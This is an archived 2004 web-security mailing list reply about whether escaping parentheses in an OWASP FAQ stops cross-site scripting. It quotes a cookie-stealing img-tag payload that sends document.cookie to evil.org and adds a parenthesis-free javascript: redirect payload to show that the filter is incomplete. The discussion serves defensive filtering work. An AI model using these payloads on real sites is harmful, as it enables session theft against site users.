WebApp Sec mailing list archives
RE: AppSec FAQ at OWASP
From: Ulf Härnhammar <Ulf.Harnhammar.9485 () student uu se>
Date: Thu, 29 Jan 2004 15:18:25 +0100
Quoting Sangita Pakala <sangita.pakala () paladion net>:
Why is it important to escape "(", ")" and "#"?<img src= "Javascript:window.open('http://www.evil.org?cookie='+document.cookie)"> Escaping the "(" and ")" above renders the function call mute.
Oh, I see. On the other hand, <img src="javascript:self.location.href='http://whatever'"> doesn't have any "(" or ")" characters, so it's not a complete solution, but a partial one. -- Ulf Härnhammar student, Uppsala universitet redaktör, idiosynkratisk ( http://labben.abm.uu.se/~ulha9485/idiosynkratisk/ )
Current thread:
- AppSec FAQ at OWASP Sangita Pakala (Jan 28)
- <Possible follow-ups>
- RE: AppSec FAQ at OWASP Sangita Pakala (Jan 29)
- RE: AppSec FAQ at OWASP Ulf Härnhammar (Jan 29)
- Re: AppSec FAQ at OWASP オマル イスマイル (Jan 29)
- Re: AppSec FAQ at OWASP Laurian Gridinoc (Jan 30)